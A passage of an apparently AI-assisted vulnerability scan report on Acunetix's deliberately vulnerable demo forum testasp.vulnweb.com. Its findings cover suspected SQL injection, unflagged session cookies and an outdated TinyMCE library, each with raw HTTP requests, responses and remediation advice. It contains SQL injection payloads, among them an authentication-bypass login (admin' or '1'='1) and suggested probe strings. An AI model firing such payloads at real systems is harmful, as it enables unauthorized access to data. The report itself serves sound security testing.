Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

tfUName=admin%27+or+%271%27%3D%271&tfUPass=admin%27+or+%271%27%3D%271
HTTP Response
Full response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Location: /showforum.asp?id=2
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:26 GMT
Content-Length: 140

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary24. SQL injection in 'id' parameter of showthread page
Severity: High  |  Confidence: Tentative  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 13:37:58
URL
http://testasp.vulnweb.com/showthread.asp?id=1
Detail
The 'id' URL parameter (observed value '1') is a numeric record identifier that drives a thread/post lookup rendered in the response (the returned post body and title reflect the selected record). Numeric identifier parameters feeding a datastore lookup are a classic SQL injection sink, and the response itself is served from a page that advertises it is deliberately vulnerable to SQL injection. Exploitation was not confirmed from this single benign request, so this is reported as a candidate requiring verification with injection probes (e.g. id=1' , id=1 OR 1=1).
AI Confidence
74%
Evidence
GET .../showthread.asp?id=1  -> params_sample: {"name":"id","type":"URL","value":"1"}; response renders the selected post ('posted by admin on 11/9/2005 ...').
HTTP Request
Full request
GET /showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=GOOKGGOBIDCPDDOIBCOBOPFH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:35:48 GMT
Connection: close
Content-Length: 3031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum
2
</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<div class="path">
			<a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/2
		</div>
      <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5">
        <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:28 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>2</div><div class='posttext'>2</div></td></tr>
      </table>
      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary25. SQL injection in 'tfSearch' parameter
Severity: High  |  Confidence: Tentative  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The 'tfSearch' parameter drives a forum search that is almost certainly used to build a backend database query on this classic ASP / IIS application. The value 'test' is reflected as the searched term, indicating it is passed to a lookup; a numeric/text search feeding a query is a strong SQL injection candidate. Payloads such as tfSearch=test' or '1'='1 should be tested to confirm error-based or boolean-based injection.
AI Confidence
72%
Evidence
url: /Search.asp?tfSearch=test ; response: "You searched for 'test'"
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.
↩ Glossary26. Suspected SQL injection in 'id' parameter of forum lookup
Severity: High  |  Confidence: Tentative  |  CWE: CWE-89 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 11:34:33
URL
http://testasp.vulnweb.com/Default.asp
Detail
The forum listing links each forum through a numeric 'id' parameter used for a database lookup (e.g. showforum.asp?id=0, ?id=1, ?id=2). A numeric identifier feeding a record lookup is a classic SQL injection candidate; exploitation cannot be confirmed from this response alone, but the pattern warrants active testing.
AI Confidence
60%
Evidence
<a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a> ... ?id=1 ... ?id=2 (numeric id feeding per-forum lookup)
HTTP Request
Full request
GET /Default.asp HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:25 GMT
Content-Length: 3538


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum forums</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Forum</td>
        <td class="tableheader">Threads</td>
        <td class="tableheader">Posts</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>7</td><td>7</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>
	</table><!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

SQL injection arises when user-controllable input is incorporated into a SQL query without adequate separation between code and data, letting an attacker interfere with the queries the application makes to its database. By injecting crafted input an attacker can read data they are not authorised to access (other users' records, password hashes, payment data), modify or delete that data, bypass authentication, escalate within the database, and in many configurations read or write files on the database server or achieve command execution.

The flaw is frequently exploitable even when no error is returned: boolean- and time-based blind techniques infer data one bit at a time, and UNION-based techniques extract whole tables. Because the database typically holds the application's most sensitive assets, SQL injection is consistently rated a high-severity, high-impact vulnerability.

Remediation

Treat user input as data, never as query structure:

  • Parameterised queries (prepared statements) - use bound parameters for every dynamic value, in every query, including ORDER BY/LIMIT contexts. This is the primary, decisive control.
  • Allow-list for non-data positions - where the dynamic part is a table/column name or sort direction that cannot be parameterised, map the input against a fixed allow-list of permitted values.
  • Use a safe ORM / query builder correctly, avoiding raw-string concatenation escape hatches.
  • Least privilege - the application's database account should hold only the rights it needs; never use a DBA/superuser account at runtime.
  • Defence in depth - input validation and generic error pages reduce the attack surface but are not a substitute for parameterisation.

Medium CWE-1004 - Sensitive Cookie Without HttpOnly Flag 1 finding

↩ Glossary27. Session cookie set without HttpOnly, Secure, or SameSite flags
Severity: Medium  |  Confidence: Certain  |  CWE: CWE-1004 [ref]  |  OWASP: A05:2021  |  Discovered: 2026-07-18 20:28:46
URL
http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Detail
The response issues the session identifier ASPSESSIONIDAACSSATB via Set-Cookie with only 'path=/' and no HttpOnly, Secure, or SameSite attributes. Without HttpOnly the cookie is readable by client-side script, without Secure it may be sent over cleartext, and without SameSite it is exposed to cross-site request scenarios.
AI Confidence
90%
Evidence
Set-Cookie: ASPSESSIONIDAACSSATB=NLILKFOBIKABBNEPOHMKBOEH; path=/
HTTP Request
Full request
GET /Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=NLILKFOBIKABBNEPOHMKBOEH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 00:27:56 GMT
Connection: close
Content-Length: 4594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<h1>About this website</h1>
<p>The website was built with the intention to test the Acunetix Web Vulnerability
Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate
the forementioned software's capabilities to find those bugs.</p>
<p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive
information on this site. This includes e-mail addresses or real names.</b></p>
<h1>About Acunetix</h1>
<P><B>Combating the web vulnerability threat<BR>
	</B>Securing a company's web applications is today's most overlooked aspect of 
	securing the enterprise. Web application hacking is on the rise with as many as 
	75% of cyber attacks done at web application level or via the web. Most 
	corporations have secured their data at the network level, but have overlooked 
	the crucial step of checking whether their web applications are vulnerable to 
	attack. Web applications, which often have a direct line into the company's 
	most valuable data assets, are online 24/7, completely unprotected by a 
	firewall and therefore easy prey for attackers.</P>
<P>Acunetix was founded with this threat in mind. We realised the only way to 
	combat web site hacking was to develop an automated tool that could help 
	companies scan their web applications for vulnerabilities. In July 2005, 
	Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
	website for vulnerabilities to SQL injection, cross site scripting and other 
	web attacks before hackers do.</P>
<P>The Acunetix development team consists of highly experienced security developers 
	who have each spent years developing network security scanning software prior 
	to starting development on Acunetix WVS. The management team is backed by years 
	of experience marketing and selling security software.</P>
<P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm">
		offices</A> in Malta, US and the UK.<BR>
</P>
		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Session cookies lacking protective attributes can be stolen through cross-site scripting (missing HttpOnly), intercepted on the network (missing Secure), or leveraged in cross-site request forgery (missing SameSite), enabling session hijacking and impersonation of the victim user.

Remediation

Set the HttpOnly, Secure, and SameSite (Lax or Strict) attributes on all session cookies. Serve the application exclusively over HTTPS so the Secure flag is enforceable, and scope the cookie path/domain as narrowly as possible.

Medium CWE-1104 1 finding

↩ Glossary28. Outdated JavaScript library: TinyMCE 2.0RC4 (2005)
Severity: Medium  |  Confidence: Certain  |  CWE: CWE-1104 [ref]  |  OWASP: A06:2021  |  Discovered: 2026-07-19 14:17:12
URL
http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js
Detail
The endpoint /jscripts/tiny_mce/tiny_mce.js serves TinyMCE version 2.0RC4, a release candidate dated 2005-10-30 as shown in the file header and the version constants set in the TinyMCE() constructor (major "2", minor "0RC4", release date "2005-10-30"). This is a pre-release build over two decades old and predates all subsequent security fixes for the editor. The Last-Modified header (Thu, 29 May 2008) corroborates that this asset has not been updated. TinyMCE of this vintage has known cross-site scripting and content-sanitization weaknesses, and its permissive default valid_elements list (which allows numerous inline event-handler attributes such as onclick, onmouseover, onfocus) increases the risk of stored/DOM XSS through editor content.
AI Confidence
90%
Evidence
/** $RCSfile: tiny_mce.js,v $ $Revision: 1.301 $ $Date: 2005/10/30 16:06:56 $ ... function TinyMCE(){...="2";...="0RC4";...="2005-10-30"; ... valid_elements ... onfocus|onblur|onclick|ondblclick|onmousedown ...
HTTP Request
Full request
GET /jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Content-Type: application/javascript
Last-Modified: Thu, 29 May 2008 12:11:36 GMT
Accept-Ranges: bytes
ETag: "7edd7d2485c1c81:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:16:03 GMT
Connection: close
Content-Length: 132342

/**
 * $RCSfile: tiny_mce.js,v $
 * $Revision: 1.301 $
 * $Date: 2005/10/30 16:06:56 $
 *
 * @author Moxiecode
 * @copyright Copyright © 2004, Moxiecode Systems AB, All rights reserved.
 */
